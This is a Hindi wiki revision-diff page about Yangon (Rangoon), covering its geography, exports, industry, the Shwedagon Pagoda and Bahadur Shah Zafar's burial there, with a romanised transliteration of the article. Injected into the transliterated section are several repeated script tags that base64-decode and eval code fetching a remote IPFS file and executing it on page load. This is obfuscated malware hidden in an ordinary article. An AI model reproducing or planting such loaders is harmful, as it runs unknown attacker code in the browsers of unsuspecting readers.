Difference between revisions of "यांगून"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
 +
[[चित्र:Shwedagon-Pagoda-Yangon.jpg|thumb|250px|श्वेडागोन पगोडा, यांगून]]
 
'''यांगून''' [[म्यांमार]] की पुरानी राजधानी है। पहले यह '[[रंगून]]' के नाम से प्रसिद्ध थी। वर्तमान समय में यह म्यांमार का सबसे बड़ा शहर है। यांगून दक्षिणी म्यांमार के मध्यवर्ती भाग में, रंगून नदी के किनारे, मर्तबान की खाड़ी तथा [[इरावती नदी]] के मुहाने से 20 मील उत्तर में, सागरतल से केवल 20 फुट की ऊँचाई पर स्थित है, जो कि सबसे बड़ा नगर तथा प्रमुख बंदरगाह है। यहाँ औसत वार्षिक [[वर्षा]] 99.6 इंच होती है। समीपवर्ती क्षेत्र में धान की [[कृषि]] अधिक मात्रा में होती है।
 
'''यांगून''' [[म्यांमार]] की पुरानी राजधानी है। पहले यह '[[रंगून]]' के नाम से प्रसिद्ध थी। वर्तमान समय में यह म्यांमार का सबसे बड़ा शहर है। यांगून दक्षिणी म्यांमार के मध्यवर्ती भाग में, रंगून नदी के किनारे, मर्तबान की खाड़ी तथा [[इरावती नदी]] के मुहाने से 20 मील उत्तर में, सागरतल से केवल 20 फुट की ऊँचाई पर स्थित है, जो कि सबसे बड़ा नगर तथा प्रमुख बंदरगाह है। यहाँ औसत वार्षिक [[वर्षा]] 99.6 इंच होती है। समीपवर्ती क्षेत्र में धान की [[कृषि]] अधिक मात्रा में होती है।
  
 
[[भारतीय इतिहास]] में भी इस शहर की महत्त्वपूर्ण भूमिका रही है। [[मुग़ल]] बादशाह बहादुरशाह ज़फ़र की मृत्यु 86 वर्ष की अवस्था में [[7 नवंबर]], [[1862]] ई. को यांगून में ही हुई और उसे यहीं पर दफनाया गया था।
 
[[भारतीय इतिहास]] में भी इस शहर की महत्त्वपूर्ण भूमिका रही है। [[मुग़ल]] बादशाह बहादुरशाह ज़फ़र की मृत्यु 86 वर्ष की अवस्था में [[7 नवंबर]], [[1862]] ई. को यांगून में ही हुई और उसे यहीं पर दफनाया गया था।
 
==निर्यात==
 
==निर्यात==
बंदरगाह से [[चावल]], टीक तथा अन्य लकड़ियाँ, खालें, पेट्रोलियम से निर्मित [[पदार्थ]] तथा [[चाँदी]], [[सीसा]], [[जस्ता]] तथा [[ताँबा|ताँबे]] की वस्तुओं का निर्यात होता है। वायुमार्ग, नदीमार्ग तथा रेलमार्ग यातायात के प्रमुख साधन हैं।
+
बंदरगाह से [[चावल]], टीक तथा अन्य लकड़ियाँ, खालें, [[पेट्रोलियम]] से निर्मित [[पदार्थ]] तथा [[चाँदी]], [[सीसा]], [[जस्ता]] तथा [[ताँबा|ताँबे]] की वस्तुओं का निर्यात होता है। वायुमार्ग, नदीमार्ग तथा रेलमार्ग यातायात के प्रमुख साधन हैं।
 +
[[चित्र:Yangon-Central-Railway-Station.jpg|thumb|250px|left|यांगून सेंट्रल रेलवे स्टेशन]]
 
==उद्योग और शिक्षा==
 
==उद्योग और शिक्षा==
 
विद्युत संस्थान, रेशमी एवं ऊनी कपड़े, लकड़ी चिराई का काम, रेलवे के सामान, जलयान निर्माण तथा मत्स्य उद्योग में काफ़ी उन्नति हो गई है। यहाँ पर सभी आधुनिक वस्तुएँ जैसे बड़े-बड़े होटल, सिनेमाघर, भंडार, पगोडा, [[गिरजाघर]], पार्क, वनस्पतिक उद्यान, अजायबघर तथा विश्वविद्यालय आदि हैं।
 
विद्युत संस्थान, रेशमी एवं ऊनी कपड़े, लकड़ी चिराई का काम, रेलवे के सामान, जलयान निर्माण तथा मत्स्य उद्योग में काफ़ी उन्नति हो गई है। यहाँ पर सभी आधुनिक वस्तुएँ जैसे बड़े-बड़े होटल, सिनेमाघर, भंडार, पगोडा, [[गिरजाघर]], पार्क, वनस्पतिक उद्यान, अजायबघर तथा विश्वविद्यालय आदि हैं।
 
==इमारत==
 
==इमारत==
यहाँ की सबसे प्रमुख इमारत श्वेड्रैगन पगोडा है, जो सागर तल से 168 फुट की ऊँचाई पर बना है। यह पगोडा 368 फुट ऊँचा, 900 फुट लंबा तथा 685 फुट चौड़ा है तथा इसके ऊपर सोने की पन्नी चढ़ी हुई है। इस नगर को युद्ध तथा [[ज्वालामुखी]] के विस्फोटों से काफ़ी हानि उठानी पड़ी है।
+
यहाँ की सबसे प्रमुख इमारत श्वेडागोन पगोडा है, जो सागर तल से 168 फुट की ऊँचाई पर बना है। यह पगोडा 368 फुट ऊँचा, 900 फुट लंबा तथा 685 फुट चौड़ा है तथा इसके ऊपर सोने की पन्नी चढ़ी हुई है। इस नगर को युद्ध तथा [[ज्वालामुखी]] के विस्फोटों से काफ़ी हानि उठानी पड़ी है।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
Line 16: Line 18:
 
{{विदेशी स्थान}}
 
{{विदेशी स्थान}}
 
[[Category:विदेशी स्थान]]
 
[[Category:विदेशी स्थान]]
 +
[[Category:विदेशी नगर]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 04:25, 24 July 2012

thumb|250px|shvedagon pagoda, yaangoon yaangoon myaanmar ki purani rajadhani hai. pahale yah 'rangoon' ke nam se prasiddh thi. vartaman samay mean yah myaanmar ka sabase b da shahar hai. yaangoon dakshini myaanmar ke madhyavarti bhag mean, rangoon nadi ke kinare, martaban ki kha di tatha iravati nadi ke muhane se 20 mil uttar mean, sagaratal se keval 20 phut ki ooanchaee par sthit hai, jo ki sabase b da nagar tatha pramukh bandaragah hai. yahaan ausat varshik varsha 99.6 ianch hoti hai. samipavarti kshetr mean dhan ki krishi adhik matra mean hoti hai.

bharatiy itihas mean bhi is shahar ki mahattvapoorn bhoomika rahi hai. mugal badashah bahadurashah zafar ki mrityu 86 varsh ki avastha mean 7 navanbar, 1862 ee. ko yaangoon mean hi huee aur use yahian par daphanaya gaya tha.

niryat

bandaragah se chaval, tik tatha any lak diyaan, khalean, petroliyam se nirmit padarth tatha chaandi, sisa, jasta tatha taanbe ki vastuoan ka niryat hota hai. vayumarg, nadimarg tatha relamarg yatayat ke pramukh sadhan haian. thumb|250px|left|yaangoon seantral relave steshan

udyog aur shiksha

vidyut sansthan, reshami evan ooni kap de, lak di chiraee ka kam, relave ke saman, jalayan nirman tatha matsy udyog mean kafi unnati ho gee hai. yahaan par sabhi adhunik vastuean jaise b de-b de hotal, sinemaghar, bhandar, pagoda, girajaghar, park, vanaspatik udyan, ajayabaghar tatha vishvavidyalay adi haian.

imarat

yahaan ki sabase pramukh imarat shvedagon pagoda hai, jo sagar tal se 168 phut ki ooanchaee par bana hai. yah pagoda 368 phut ooancha, 900 phut lanba tatha 685 phut chau da hai tatha isake oopar sone ki panni chadhi huee hai. is nagar ko yuddh tatha jvalamukhi ke visphotoan se kafi hani uthani p di hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>